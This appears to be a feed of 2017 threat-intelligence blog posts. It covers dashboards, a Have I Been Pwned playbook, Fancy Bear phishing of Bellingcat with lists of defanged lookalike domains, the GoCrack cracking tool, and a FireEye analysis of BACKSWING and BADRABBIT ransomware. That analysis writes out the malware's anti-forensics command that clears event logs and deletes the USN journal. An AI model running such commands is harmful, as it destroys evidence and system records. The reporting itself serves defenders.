    • Technical Blogs and Reports - This source automatically captures and tags intelligence shared in dozens of open source cybersecurity blogs and reports.This creates a one-stop-shop for organizations to review recently identified intelligence.

Making Life Easier with Dashboards

With ThreatConnect's new Dashboard feature we can create populated tables and graphs for medical and health verticals based on the aforementioned relevant threats and tags. Below is a simple example showing a Dashboard with four tables capturing Groups and Indicators tagged with medical and health sectors and the threats that are pertinent to them. Dashboards like this one make it easy for organizations to quickly identify and triage intelligence that is relevant to their investigations or defensive efforts.




Given the speed at which previous attacks and compromises within the medical and health sector have escalated, coupled with the inherent need to ensure continuity of operations, staying apprised of pertinent threat intelligence is a must for those organizations. Further, once attacks or specific threats are identified, an organization can mature toward proactively identifying and defending against future attacks. The ThreatConnect platform assists organizations at any threat intelligence maturity level in quickly and efficiently identifying, researching, and defending against their most pertinent threats.

The post ThreatConnect Provides a Report on Healthcare and Medical Industry Threats appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Hybrid Analysis Grows Up – Acquired by CrowdStrike

CrowdStrike acquired Payload Security, the company behind the automated malware analysis sandbox technology Hybrid Analysis, in November 2017. Jan Miller founded Payload Security approximately 3 years earlier. The interview I conducted with Jan in early 2015 captured his mindset at the onset of the journey that led to this milestone. I briefly spoke with Jan again, a few days after the acquisition. He reflected upon his progress over the three years of leading Payload Security so far and his plans for Hybrid Analysis as part of CrowdStrike.

Jan, why did you and your team decide to join CrowdStrike?

Developing a malware analysis product requires a constant stream of improvements to the technology, not only to keep up with the pace of malware authors’ attempts to evade automated analysis but also innovate and embrace the community. The team has accomplished a lot thus far, but joining CrowdStrike gives us the ability to access a lot more resources and grow the team to rapidly improve Hybrid Analysis in the competitive space that we live in. We will have the ability to bring more people into the team and also enhance and grow the infrastructure and integrations behind the free Hybrid Analysis community platform.

What role did the free version of your product, available at, play in the company’s evolution?

A lot of people in the community have been using the free version of Hybrid Analysis to analyze their own malware samples, share them with friends or to look-up existing analysis reports and extract intelligence. Today, the site has approximately 44,000 active users and around 1 million sessions per month. One of the reasons the site took off is the simplicity and quality of the reports, focusing on what matters and enabling effective incident response.

The success of Hybrid Analysis was, to a large extent, due to the engagement from the community. The samples we have been receiving allowed us to constantly field-test the system against the latest malware, stay on top of the game and also to embrace feedback from security professionals. This allowed us to keep improving at rapid pace in a competitive space, successfully.

What will happen to the free version of Hybrid Analysis? I saw on Twitter that your team pinky-promised to continue making it available for free to the community, but I was hoping you could comment further on this.

I’m personally committed to ensuring that the community platform will stay not only free, but grow even more useful and offer new capabilities shortly. Hybrid Analysis deserves to be the place for professionals to get a reasoned opinion about any binary they’ve encountered. We plan to open up the API, add more integrations and other free capabilities in the near future.

What stands out in your mind as you reflect upon your Hybrid Analysis journey so far? What’s motivating you to move forward?

Starting out without any noteworthy funding, co-founders or advisors, in a saturated high-tech market that is extremely fast paced and full of money, it seemed impossible to succeed on paper. But the reality is: if you are offering a product or service that is solving a real-world problem considerably better than the market leaders, you always have a chance. My hope is that people who are considering becoming entrepreneurs will be encouraged to pursue their ideas, but be prepared to work 80 hours a week, have the right technology, the feedback from the community, amazing team members and lean on insightful advisors and you can make it happen.

In fact, it’s because of the value Hybrid Analysis has been adding to the community that I was able to attract the highly talented individuals that are currently on the team. It has always been important for me to make a difference, to contribute something and have a true impact on people’s lives. It all boils down to bringing more light than darkness into the world, as cheesy as that might sound.

Playbook Fridays: Have You Been Pwned?

Playbook Fridays: Check haveibeenpwned for indicators

Enriching Indicators with haveibeenpwned

ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important. And in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.


Why Was the Playbook Created?

Data breaches come and go and it is easy to forget who was breached and when. The team at Have I Been Pwned? has built a searchable database of 4.8 billion compromised accounts and provide a simple to use REST API for queries.  

We have built a PlayBook to leverage this data and enrich the indicators that are important to your SecOps team.

How it Works:

  1. When looking at any EmailAddress indicator in the ThreatConnect platform simply click "Check HIBP".  That's all that is needed.
  2. From here, the ThreatConnect PlayBooks engine takes over and performs the following steps:
    a. Check HIBP for the email address
    b. If found, perform some data transformations to extract the data needed
    c. Tag the current Indicator with the name of the breach it was found in
    d. Search for existing Incidents to associate the EmailAddress too, creating a new Incident if required


One step for the analyst




Here you can see that this unlucky user's account was found in over 50 data breaches and we tagged the indicator with each breach.




We also created and associated an incident for each data breach that contains the breach date as well as a brief description of the breach.



It's important to note that we did not write a single line of code to build this playbook with HIBP, and relied entirely on utility apps provided in ThreatConnect Playbooks to "build the integration".  This showcases the power and extensibility of ThreatConnect as a true platform.  If an integration doesn't exist, you can easily create one using the built-in capabilities of ThreatConnect Playbooks.


How to Use It:

  1. Import the PlayBook, we have created a GitHub repository with the PlayBook file
  2. Click "Check HIBP"

The post Playbook Fridays: Have You Been Pwned? appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Best Practices for Dashboards in Cybersecurity and Threat Intelligence

Explained Using New ThreatConnect Dashboards 

There's no shortage of "dashboards" available in the software world. Walking the floor at any major industry event, it's hard to miss the hordes of vendors touting their wares by showcasing line graphs, fancy animations, and (shudder) pie charts on big screen displays designed to shock and awe attendees into stopping by for scans in exchange for tchotchkes. But when it comes time to purchase from one of those vendors and you log in to their tool or platform, how often is the dashboard really your leaping-off point for your day-to-day? How much use do you get out of them on a daily basis? What's the point of a "bright and shiny" dashboard if all the bright and shiny does is make your eyes glaze over?



Dashboards should not be an impenetrable fog of complication.


Perhaps the reason dashboards aren't as captivating or useful as they could be is that too many of them just don't help users answer tough, key questions.

In our latest release, ThreatConnect introduces a brand new dashboard feature. In this blog post, I'll walk you through some of the built-in dashboard charts and use them to illustrate some best practices that you can employ when creating your own dashboards. That way, you can be sure your new ThreatConnect dashboards will help you answer tough, key questions about threat intelligence and your organization's security.

What Makes a Good Dashboard?

A good dashboard should provide at-a-glance monitoring of the information you need to make key decisions. Think about your car dashboard for a moment: it shows speed so you know to slow down or go faster, fuel levels so you know when to make a pit stop, and warning lights to show if there's a problem. These are key indicators that help drive decisions. Your car dashboard does not display a pie chart of how many times you've made left- and right-hand turns, counters for how blinky your turn signals are, or a rotating pew-pew map of where other cars are honking their horns at each other. These things don't make you a better driver.

Your ThreatConnect Dashboard should be like a car dashboard: it should help you make at-a-glance decisions. To that end, your dashboard should be, or show:

  • Comparative - Dashboards should help put things in context so you can compare data against one another.
  • Understandable - Your dashboards should be easy to follow and the information on them should be meaningful.
  • Ratio or Rate - Ideally, you should have some idea of change over time. There's a reason the biggest number on your dashboard is "Miles per Hour" and not "Miles Driven" or "Hour Driven."
  • Behavior Changing - Probably the most important one. Dashboards should provide information that helps drive the behavior of your security team.

I like to remember this using the acronym "C.U.R.B." Now let's go in-depth on each of these items, using examples from ThreatConnect.


A guy walks into his therapist's office. Therapist says, "so, how's the family?" The guy says, "Compared to what?"

Good joke, right? It brings to mind the first part of CURB: Comparative. We deal with a lot of numbers and bits of information in cybersecurity, so it's important to understand how those metrics compare to others. For example, if I told you that your team tracked ten incidents last month, what would you do with that information? Is that a lot? A little? But what if I told you that your team had ten incidents last month, but zero in the two months prior. Now you have some context for that number, and can consider taking action.

Let's take a look at a noncomparative and comparative example in ThreatConnect.


A chart of popular tags from this week.


In the above dashboard card¹, we've created a Query-based chart. These charts use TQL (ThreatConnect Query Language) to query and aggregate information. This particular card shows the most popular tags used on indicators that were added to ThreatConnect in the past week. You can duplicate this card yourself using the following query: dateAdded >= "NOW() - 7 DAYS".

Don't get me wrong, it's not a bad card. Especially because I can click on any of these tags and see the associated indicators and intelligence. But consider how much more useful it would be if we compared "this week" to "last week":


Comparing this week against last week helps us identify trends and patterns.


Now we can see that these tags change week to week. Malware trackers have fallen off and instead we see a bucket of possibly benign indicators. Where'd they come from? Are we in danger of spending time on some false positives? Was that Felix malware ever resolved?

By comparing these two cards against each other, we start telling a story and can begin deciding how to take action. The "Last Week" card was created using the query: dateAdded >= "NOW() - 14 DAYS" and dateAdded < "NOW() - 7 DAYS". Note that both cards are shown side-by-side on the pre-built "Operations Dashboard" available in our Cloud environment.


Take a look at the space shuttle cockpit photo from the beginning of this article. If your car looked like that, how quickly do you think you'd be able to react? The same is true in cybersecurity: we can't react to our data and intelligence if we can't understand it! The same is also true for the specific metrics we use; there's a reason your car shows "Miles per Hour" and not "Leagues per Microfortnight."


¹A "card" is the basic building block of a dashboard. Cards can be charts (bar, line, treemap, etc.), datatables, or functional widgets like a search bar.



Let's say you wanted to monitor the most popular tags in one or more sources and communities either for all time or for a specific date range. This is a good way of identifying interesting topics, especially when looking into a new source of intelligence.


How can you see what's going on in this hard-to-understand chart?
I dream of a world where terrible charts are anomalies.


The pie chart above is certainly one way to do it. But why display it that way? Most tags are too small to appear, and it's very hard to tell how big each of the tags are. Plus, many of the tags are too small to fit!


Fewer tags and a different layout makes for a much more understandable chart.


All we need for our decision, "does this source contain intel that's interesting to me?", is a simple grid that clearly shows the available tags and how many there are of each. An added bonus is that you can click on any of these tags much more easily than you could on the pie chart to actually view the associated indicators and intelligence. Note that this card (not the inveigling pie chart) is available on the built-in "My Dashboard" in our Cloud environment.

Ratio or Rate

This is probably the least critical of the four parts of CURB, but only because it doesn't apply to every dashboard card and metric like the others do. But, it does have its place! Using a ratio or rate makes it much easier to understand what's happening at a particular moment in time. The biggest number on your car dashboard is a rate (miles per hour) because as a driver you need to know how fast you're going now - just showing miles driven or hours driven won't tell you that and won't help you make a decision around whether to speed up or slow down.


What the heck happened with those two spikes in the right-hand chart? Better investigate!


In the example on the left, we show a cumulative count of Observations and False Positives over the past month. And basically we can see that... it goes up, which is what we'd expect since all we're doing is summing numbers! It tells a nice story, but not one from which we can really make decisions. Compare that to the example on the right where we take the exact same data but look at it per day. A pattern emerges; one that is worthy of additional investigation.

The card on the right is available on our built-in "Source Analysis" dashboard in our Cloud environment.


Of all the parts of CURB, this one is probably the most important. The point of a dashboard is to help us make decisions, so the information we present in the dashboard must be behavior-changing. A big reason fancy dashboards fall short is because they offer "pretty pictures" but not behavior-changing information. Going back to the car example, if your dashboard says you're going 55 miles per hour on the highway and I ask you what you would do if your dashboard said 25 miles per hour, you know exactly how your behavior would change based on that information: you'd speed up!

Compare that to a metric that didn't change behavior. If you had a dashboard that said you had a million indicators, and I asked what you would do if the same dashboard told you that you had a million and a half indicators, what would you do? How would your behavior change? It probably wouldn't change at all: it's not a behavior-changing metric!

So I propose a litmus test when using a dashboard: if the information you're seeing changed, what would you do differently? If the answer is "I don't know" or "probably nothing," you should consider whether you're getting value out of that dashboard.

Let's say you manage a security team. Your goal is to try and make your team more proactive by identifying and blocking adversary assets directly rather than responding exclusively to active campaigns. To facilitate this, you've configured a Playbook that allows your team to block indicators that have been associated to specific pieces of intelligence like Incidents, Campaigns, and Adversaries. For your dashboard, you want to track how many indicators are being deployed based on the type of intelligence to see if your team is addressing the problem.

First, configure custom metrics to track the average monthly deployments to your defensive devices by the type of Group (Incident, Adversary, etc.), versus the indicator deployments your team has done in the current month.



ThreatConnect lets you create custom metrics to add to your dashboard. Note the "Interval" dropdown to help ensure you're using a ratio or rate.


Next, add the metrics to the Playbook that your team uses to deploy indicators to your defensive devices.


These metrics can be used outside of charting to drive logic and make your Playbooks smarter.


Now, every time your team uses this Playbook to deploy indicators, your dashboard will be populated with these metrics.


Average monthly host deployments on average by intelligence type.


Host -deployments-in-the-current-month-by-intelligence-type

Host deployments in the current month by intelligence type.


By putting those two charts on your dashboard, you can see that the initiative to have your team take more proactive action appears to be working (they're blocking Adversary assets instead of just reacting). And now we come full circle to the behavior-changing aspect. If the bottom card showed that your team was still taking most of their blocking actions on Incidents and Campaigns, you'd know to course-correct the initiative. This dashboard works because you've selected metrics that will drive decisions around a specific goal. Congratulations!

Learn More

Now that you understand how to create dashboards that are Comparative, Understandable, use Rates, and are Behavior Changing, I hope you'll take ThreatConnect's  new dashboard feature for a spin and try to make CURB-y dashboards for yourself! This post barely scratches the surface of ThreatConnect Dashboards. Learn more about dashboards, here. For a full copy of the release notes so you can see everything that's included in our latest release and our new TAXII server, please contact For product feedback, please contact me directly at

Interested in ThreatConnect Dashboards? Sign Up For A Free Account Below to Get Started

The post Best Practices for Dashboards in Cybersecurity and Threat Intelligence appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Fancy Bear Pens the Worst Blog Posts Ever

ThreatConnect reviews continuing Fancy Bear activity targeting citizen journalism organization Bellingcat and identifies a new tactic leveraging Blogspot to mask their credential harvesting links.

Our friends over at Bellingcat, which conducts open source investigations and writes extensively on Russia-related issues, recently shared a new tranche of spear-phishing emails they had received. Spoiler alert: they originated from Fancy Bear actors. Using the ThreatConnect platform we ingested the spear-phishing emails Bellingcat provided, processed out the relevant indicators, and compared them to previously known Fancy Bear activity. It turns out that this campaign had an association to 2016 Fancy Bear activity previously identified by the German Federal Office for the Protection of the Constitution (BfV). More interestingly however, Fancy Bear employed a new tactic we hadn't previously seen: using Blogspot-hosted URLs in their spear-phishing email messages. The Blogspot page contained a javascript window location that redirected the visitor to a second URL hosted on a dedicated server.

Delivery Stage

The phishing email used to deliver the malicious URLs pretends to be a password change for the target's Google account or a link to view a folder shared via Dropbox. The collection of indicators related to this campaign have been shared with ThreatConnect's Common Community here.


Example of the Google account themed variant



Example of the Dropbox themed variant


The phishing email contains a link hosted on Blogspot such as this: hxxps://pkfnmugfdsveskjtb[.]blogspot[.]com. This URL also contains a query parameter, "uid", that is unique per phishing email. The full format for the URL is the following:




Importing the malicious email into ThreatConnect


The blogspot page contains a small snippet of Javascript near the top of the source html that includes a Javascript window location redirect. An example of this javascript is:


The landing page URL in this redirect, hxxps://google[.]com[.]account-password[.]ga/security/signinoptions/password is hosted on google[.]com[.]account-password[.]ga which currently resolves to the IP address 80.255.12[.]231. This IP is a dedicated VPS hosted by MonoVM, a company based in Dubai. Honestly, this is quite low quality content for a blog. Here is some good advice for authoring blog content, and if so inclined, here is a good example to study.

Passive DNS Analysis

Using  Farsight's passive DNSDB integration in ThreatConnect, a number of other similar hostnames were found resolving to 80.255.12[.]231. One in particular, accounts[.]google[.]com[.]securitymail[.]gq, stands out from the rest. The base domain of this host, securitymail[.]gq, has a previous resolution to IP 95.153.32[.]52. This IP address is a broadband connection located in Estonia on TELE2's network that was also used to host the domain smtprelayhost[.]com from December 2015 to December 2016. This overlaps with the time that securitymail[.]gq resolved to the same broadband IP address in March 2016. In case you may have missed it, smtprelayhost[.]com is called out as being Fancy Bear infrastructure in BfV Cyber-Brief Nr. 01/2016.


Screenshot showing passive DNS overlap




Overview of the phishing campaign - highlighting infrastructure overlap

Bedecked in Blogspot

The use of Blogspot URLs has similarities with the notional tactics identified in a September Salon article on Fancy Bear leveraging Google's Accelerated Mobile Pages (AMP) to create URLs for their credential harvesting pages. Doing so likely allowed some Fancy Bear spear-phishing messages to avoid security filters that would have otherwise identified the malicious URLs. In this same way, a URL hosted on Google's own systems, in this case Blogspot, may be more likely to get past spam filters than URLs hosted on a third party IP address or hostname.


Exploiting Their Behavior

Several of the domains that host the credential harvesting pages identified above use .ga or .gq top level domains (TLDs) and were registered through Freenom. This reminded us of Fancy Bear's .ga Freenom infrastructure that they also employed against Bellingcat in October 2016. Looking closer at the domains identified in their recent attacks using our DomainTools Spaces App, we see that most of the domains were registered in the last three months.





ThreatConnect's DomainTools Spaces App results for account-password[.]ga and passwordreset[.]gq


What's more, the use of strings like "security," "login," "password," and "files" are another component of the registration tactics that they are employing and we may potentially be able to exploit. To that end, we decided to take a look at other domains that were registered using Freenom since July 2017 and contained one of those strings.


Using DomainTools Iris, we conducted a search for any domains that use a Freenom name server, use a .ga or .gq TLD, and contained one of the four strings previously mentioned.



DomainTools Iris query for Freenom domains.


Unfortunately, WHOIS records for Freenom-registered domains don't capture the create date showing when the domain was registered. From there, we reviewed the WHOIS history for each of the domains returned from the Iris query to identify when it was registered based on the earliest available record. The following domains were the result of that research:



access-apple-login-account[.]gq fileshelpprotut[.]ga reset-password-com[.]ga
account-activity-verification-login[.]ga fileshelpprotut[.]gq restore-login-account[.]gq
account-verify-comfirmation-info-login[.]ga filestore[.]gq review-quilogin[.]ga
account-verify-comfirmation-info-login[.]gq goldsecurity[.]ga secure-bankofamerica--login-com[.]ga
accountlogin-inc[.]ga info-apple-login-security[.]gq secure-bankofamerica--login-com[.]gq
accountverify-disableinfo-login[.]gq jp-login[.]gq secure-login-helpid-locked[.]gq
alert-new-login-com[.]ga locked-service-security[.]ga secure-management-login-account-index-webpass[.]gq
apple-realertlogin[.]gq login-bancochile-cl[.]ga secure-mobile-login1[.]gq
appleid-login-appleid[.]ga login-pap-web-access[.]ga secure1-client-login[.]ga
appleid-manageaccountloginupdated[.]ga login-recovery[.]gq secure1-client-login[.]gq
appleidcustomer-servicess-com-loginaccount[.]ga login-sec-apple-secure-account-updated[.]ga secure1-login-apps[.]gq
appleidcustomer-servicess-com-loginaccount[.]gq login-secure1-mobile[.]ga secure5647login-com[.]ga
browsersecurity[.]ga login-unlock-account[.]ga security-login-information[.]gq
change-password[.]gq login-update-unlock[.]gq securitycenter[.]ga
cleantarea-customerlogin-com[.]ga loginapps-info[.]ga service-account-home-login[.]gq
clientareasecurity1[.]gq loginpaypaas-securityuserid[.]ga service-autoreset-password-youraccount[.]ga
clientareasecurity4[.]gq loginservice-maintanceserversecurity[.]gq service-login-apple-verify-account-locked[.]gq
com-recoverylogin[.]gq manage-login[.]gq servicelogin-access-failed[.]gq
com-supportlogin-adminverification[.]ga manage-logins[.]gq services-loginaccount[.]ga
darksecurity[.]ga mod-files[.]ga sharefiles[.]gq
dns-sec-login-apple-invoice-confirmations[.]ga mydocuments[.]gq signin-login-php[.]ga
dns-webapps-login-account-secure-servers[.]ga newaction-loginactivituresource[.]ga srilankadocuments[.]ga
documentation[.]gq newfiles[.]ga statement-login-update-info[.]ga
documentshandler[.]ga ns-secures-login-accountjp-updates-community[.]gq summary-loginconfirmation[.]ga
emailloginerror[.]gq nursingdocumentation[.]gq unsecured-login-attempt[.]ga
facebook-login-page[.]gq ourfiles[.]ga verify-login-account-iinformation[.]ga
failure-login[.]ga pdf-document[.]ga verify-login-account-iinformation[.]gq
fileshelp[.]ga protector-files[.]ga welcome-apple-protectyourpassword[.]gq
fileshelp[.]gq recoverylogin-access[.]ga



While not definitively attributable to Fancy Bear, given some consistencies with their identified infrastructure, organizations that are concerned about Fancy Bear activity should thoroughly scrutinize any network activity identified with these domains. These domains have been shared in the ThreatConnect platform in Incident 20171031A: Additional .ga and .gq Freenom Infrastructure Similar to Fancy Bear's.

Bear with a Bone

At this point, this Russian advanced persistent threat (APT) has consistently targeted Bellingcat for at least two-and-a-half years, ever since the first identified activity in February 2015. Whatever your organization's biggest threat is, we'd argue that understanding their tactics and defending against and exploiting those tactics is the pinnacle of incorporating threat intelligence into your defenses. From our ThreatConnect Intelligence source to our extensive integrations, the ThreatConnect Platform enables organizations to not only identify their relevant threats, but proactively capitalize on their known tactics and automagically incorporate that intelligence into their defenses. In this case, we used the ThreatConnect platform to understand how an attack attempted to compromise an organization, connect information from that attack to a previous one, attribute the activity, and memorialize intelligence derived from the operation.

The post Fancy Bear Pens the Worst Blog Posts Ever appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Introducing GoCrack: A Managed Password Cracking Tool

FireEye's Innovation and Custom Engineering (ICE) team released a tool today called GoCrack that allows red teams to efficiently manage password cracking tasks across multiple GPU servers by providing an easy-to-use, web-based real-time UI (Figure 1 shows the dashboard) to create, view, and manage tasks. Simply deploy a GoCrack server along with a worker on every GPU/CPU capable machine and the system will automatically distribute tasks across those GPU/CPU machines.

Figure 1: Dashboard

As readers of this blog probably know, password cracking tools are an effective way for security professionals to test password effectiveness, develop improved methods to securely store passwords, and audit current password requirements. Some use cases for a password cracking tool can include cracking passwords on exfil archives, auditing password requirements in internal tools, and offensive/defensive operations. We’re releasing GoCrack to provide another tool for distributed teams to have in their arsenal for managing password cracking and recovery tasks.

Keeping in mind the sensitivity of passwords, GoCrack includes an entitlement-based system that prevents users from accessing task data unless they are the original creator or they grant additional users to the task. Modifications to a task, viewing of cracked passwords, downloading a task file, and other sensitive actions are logged and available for auditing by administrators. Engine files (files used by the cracking engine) such as Dictionaries, Mangling Rules, etc. can be uploaded as “Shared”, which allows other users to use them in task yet do not grant them the ability to download or edit. This allows for sensitive dictionaries to be used without enabling their contents to be viewed.

Figure 2 shows a task list, Figure 3 shows the “Realtime Status” tab for a task, and Figure 4 shows the “Cracked Passwords” tab.

Figure 2: Task Listing

Figure 3: Task Status

Figure 4: Cracked Passwords Tab

GoCrack is shipping with support for hashcat v3.6+, requires no external database server (via a flat file), and includes support for both LDAP and database backed authentication. In the future, we plan on adding support for MySQL and Postgres database engines for larger deployments, ability to manage and edit files in the UI, automatic task expiration, and greater configuration of the hashcat engine. We’re shipping with Dockerfile’s to help jumpstart users with GoCrack. The server component can run on any Linux server with Docker installed. Users with NVIDIA GPUs can use NVIDIA Docker to run the worker in a container with full access to the GPUs.

GoCrack is available immediately for download along with its source code on the project's GitHub page. If you have any feature requests, questions, or bug reports, please file an issue in GitHub.

ICE is a small, highly trained, team of engineers that incubate and deliver capabilities that matter to our products, our clients and our customers. ICE is always looking for exceptional candidates interested in solving challenging problems quickly. If you’re interested, check out FireEye careers.

BACKSWING – Pulling a BADRABBIT Out of a Hat

Executive Summary

On Oct. 24, 2017, coordinated strategic web compromises started to distribute BADRABBIT ransomware to unwitting users. FireEye appliances detected the download attempts and blocked our user base from infection. During our investigation into the activity, FireEye identified a direct overlap between BADRABBIT redirect sites and sites hosting a profiler we’ve been tracking as BACKSWING. We’ve identified 51 sites hosting BACKSWING and four confirmed to drop BADRABBIT. Throughout 2017, we observed two versions of BACKSWING and saw a significant increase in May with an apparent focus on compromising Ukrainian websites. The pattern of deployment raises the possibility of a strategic sponsor with specific regional interests and suggest a motivation other than financial gain. Given that many domains are still compromised with BACKSWING, we anticipate that there is a risk that they will be used for future attacks.

Incident Background

Beginning on Oct. 24 at 08:00 UTC, FireEye detected and blocked attempts to infect multiple clients with a drive-by download masquerading as a Flash Update (install_flash_player.exe) that delivered a wormable variant of ransomware. Users were redirected to the infected site from multiple legitimate sites (e.g. http://www.mediaport[.]ua/sites/default/files/page-main.js) simultaneously, indicating a coordinated and widespread strategic web compromise campaign.

FireEye network devices blocked infection attempts at over a dozen victims primarily in Germany, Japan, and the U.S. until Oct. 24 at 15:00 UTC, when the infection attempts ceased and attacker infrastructure – both 1dnscontrol[.]com and the legitimate websites containing the rogue code – were taken offline.

BACKSWING Framework Likely Connected to BADRABBIT Activity

Strategic web compromises can have a significant amount of collateral targeting. It is common for threat actors to pair a strategic web compromise with profiling malware to target systems with specific application versions or victims. FireEye observed that BACKSWING, a malicious JavaScript profiling framework, was deployed to at least 54 legitimate sites starting as early as September 2016.  A handful of these sites were later used to redirect to BADRABBIT distribution URLs.

FireEye iSIGHT Intelligence tracks two distinct versions of BACKSWING that contain the same functionality, but differ in their code styles. We consider BACKSWING a generic container used to select attributes of the current browsing session (User-Agent, HTTP Referrer, Cookies, and the current domain). This information is then relayed to a “C2” sometimes to referred to as a “receiver.” If the receiver is online, the server returns a unique JSON blob to the caller which is then parsed by the BACKSWING code (Figure 1).

Figure 1: BACKSWING Reply

BACKSWING anticipates the JSON blob to have two fields, “InjectionType” (expected to be an integer) and “InjectionString” (expected to be string containing HTML content). BACKSWING version 1 (Figure 2) explicitly handles the value of “InjectionType” into two code paths:

  • If InjectionType == 1 (Redirect browser to URL)
  • If InjectionType != 1 (render HTML into the DOM)

Figure 2: Backswing Version 1

In Version 2 (Figure 3), BACKSWING retains similar logic, but generalizes the InjectionString to be handled strictly to render the reply into the DOM.

Figure 3: BACKSWING Version 2

Version 1:

  • FireEye observed the first version of BACKSWING in late 2016 on websites belonging to a Czech Republic hospitality organization in addition to a government website in Montenegro. Turkish-tourism websites were also injected with this profiler.
  • BACKSWING v1 was commonly injected in cleartext to affected websites, but over time, actors began to obfuscate the code using the open-source Dean-Edwards Packer and injected it into legitimate JavaScript resources on affected websites. Figure 4 shows the injection content.
  • Beginning in May 2017, FireEye observed a number of Ukrainian websites compromised with BACKSWING v1, and in June 2017, began to see content returned from BACKSWING receivers.
  • In late June 2017, BACKSWING servers returned an HTML div element with two distinct identifiers. When decoded, BACKSWING v1 embedded two div elements within the DOM with values of 07a06a96-3345-43f2-afe1-2a70d951f50a and 9b142ec2-1fdb-4790-b48c-ffdf22911104. No additional content was observed in these replies.

Figure 4: BACKSWING Injection Content

Version 2:

  • The earliest that FireEye observed BACKSWING v2 occurred on Oct. 5, 2017 across multiple websites that previously hosted BACKSWING v1
  • BACKSWING v2 was predominantly injected into legitimate JavaScript resources hosted on affected websites; however, some instances were injected into the sites’ main pages
  • FireEye observed limited instances of websites hosting this version were also implicated in suspected BADRABBIT infection chains (detailed in Table 1).

Malicious profilers allow attackers to obtain more information about potential victims before deploying payloads (in this case, the BADRABBIT “flash update” dropper). While FireEye has not directly observed BACKSWING delivering BADRABBIT, BACKSWING was observed on multiple websites that were seen referring FireEye customers to 1dnscontrol[.]com, which hosted the BADRABBIT dropper. 

Table 1 highlights the legitimate sites hosting BACKSWING that were also used as HTTP referrers for BADRABBIT payload distribution.

Compromised Website



Observed BADRABBIT Redirect


Not Available

Not Available





























Table 1: Sites hosting BACKSWING profilers and redirected users to a BADRABBIT download site

The compromised websites listed in Table 1 demonstrate one of the first times that we have observed the potential weaponization of BACKSWING. FireEye is tracking a growing number of legitimate websites that also host BACKSWING underscoring a considerable footprint the actors could leverage in future attacks. Table 2 provides a list of sites also compromised with BACKSWING

Compromised Website

































































































































































Table 2: Additional sites hosting BACKSWING profilers and associated receivers

The distribution of sites compromised with BACKSWING suggest a motivation other than financial gain. FireEye observed this framework on compromised Turkish sites and Montenegrin sites over the past year. We observed a spike of BACKSWING instances on Ukrainian sites, with a significant increase in May 2017. While some sites hosting BACKSWING do not have a clear strategic link, the pattern of deployment raises the possibility of a strategic sponsor with specific regional interests.

BADRABBIT Components

BADRABBIT is made up of several components, as described in Figure 5.

Figure 5: BADRABBIT components

Install_flashPlayer.exe (MD5: FBBDC39AF1139AEBBA4DA004475E8839)

The install_flashplayer.exe payload drops infpub.dat (MD5: C4F26ED277B51EF45FA180BE597D96E8) to the C:\Windows directory and executes it using rundll32.exe with the argument C:\Windows\infpub.dat,#1 15. This execution format mirrors that of EternalPetya.

infpub.dat (MD5: 1D724F95C61F1055F0D02C2154BBCCD3)

The infpub.dat binary is the primary ransomware component responsible for dropping and executing the additional components shown in the BADRABBIT Components section. An embedded RSA-2048 key facilitates the encryption process, which uses an AES-128 key to encrypt files. The extensions listed below are targeted for encryption:

The following directories are ignored during the encryption process:

  • \Windows
  • \Program Files
  • \ProgramData
  • \AppData

The malware writes its ransom message to the root of each affected drive with the filename Readme.txt.

The infpub.dat is capable of performing lateral movement via WMI or SMB. Harvested credentials provided by an embedded Mimikatz executable facilitate the infection of other systems on the network. The malware contains lists of common usernames, passwords, and named pipes that it can use to brute-force other credentials for lateral movement.

If one of four Dr.Web antivirus processes is present on the system, file encryption is not performed. If the malware is executed with the “-f” command line argument, credential theft and lateral movement are bypassed.

dispci.exe (MD5: B14D8FAF7F0CBCFAD051CEFE5F39645F)

The dispci.exe binary interacts with the DiskCryptor driver (cscc.dat) to install the malicious bootloader. If one of three McAfee antivirus processes is running on the system, dispci.exe is written to the %ALLUSERSPROFILE% directory; otherwise, it is written to C:\Windows. The sample is executed on system start using a scheduled task named rhaegal.

cscc.dat (MD5s: B4E6D97DAFD9224ED9A547D52C26CE02 or EDB72F4A46C39452D1A5414F7D26454A)

A 32 or 64-bit DiskCryptor driver named cscc.dat facilitates disk encryption. It is installed in the :\Windows directory as a kernel driver service named cscc.

Mimikatz usage (MD5s: 37945C44A897AA42A66ADCAB68F560E0 or 347AC3B6B791054DE3E5720A7144A977)

A 32 or 64-bit Mimikatz variant is written a temporary file (e.g., 651D.tmp) in the C:\Windows directory and executed by passing a named pipe string (e.g., \\.\pipe\{8A93FA32-1B7A-4E2F-AAD2-76A095F261DC}) as an argument. Harvested credentials are passed back to infpub.dat via the named pipe, similar to EternalPetya.

BADRABBIT Compared to EternalPetya

The infpub.dat contains a checksum algorithm like the one used in EternalPetya. However, the initial checksum value differs slightly: 0x87654321 in infpub.dat, 0x12345678 in EternalPetya. infpub.dat also supports the same command line arguments as EternalPetya with the addition of the “-f” argument, which bypasses the malware’s credential theft and lateral movement capabilities.

Like EternalPetya, infpub.dat determines if a specific file exists on the system and will exit if found. The file in this case is cscc.dat. infpub.dat contains a wmic.exe lateral movement capability, but unlike EternalPetya, does not contain a PSEXEC binary used to perform lateral movement.

Both samples utilize the same series of wevtutil and fsutil commands to perform anti-forensics:

wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %SYSTEMDRIVE%

FireEye Detections


Detection Names


malware.binary.exe, Trojan.Ransomware.MVX, Exploit.PossibleWaterhole.BACKSWING


BADRABBIT RANSOMWARE (FAMILY), Gen:Heur.Ransom.BadRabbit.1, Gen:Variant.Ransom.BadRabbit.1


WINDOWS METHODOLOGY [Scheduled Task Created], WINDOWS METHODOLOGY [Service Installation], WINDOWS METHODOLOGY [Audit Log Cleared], WINDOWS METHODOLOGY [Rundll32 Ordinal Arg], WINDOWS METHODOLOGY [Wevtutil Clear-log], WINDOWS METHODOLOGY [Fsutil USN Deletejournal], WINDOWS METHODOLOGY [Multiple Admin Share Failures]

We would like to thank Edward Fjellskål for his assistance with research for this blog.


File: Install_flashPlayer.exe
Hash: FBBDC39AF1139AEBBA4DA004475E8839
Description: install_flashplayer.exe drops infpub.dat

File: infpub.dat
Hash: 1D724F95C61F1055F0D02C2154BBCCD3
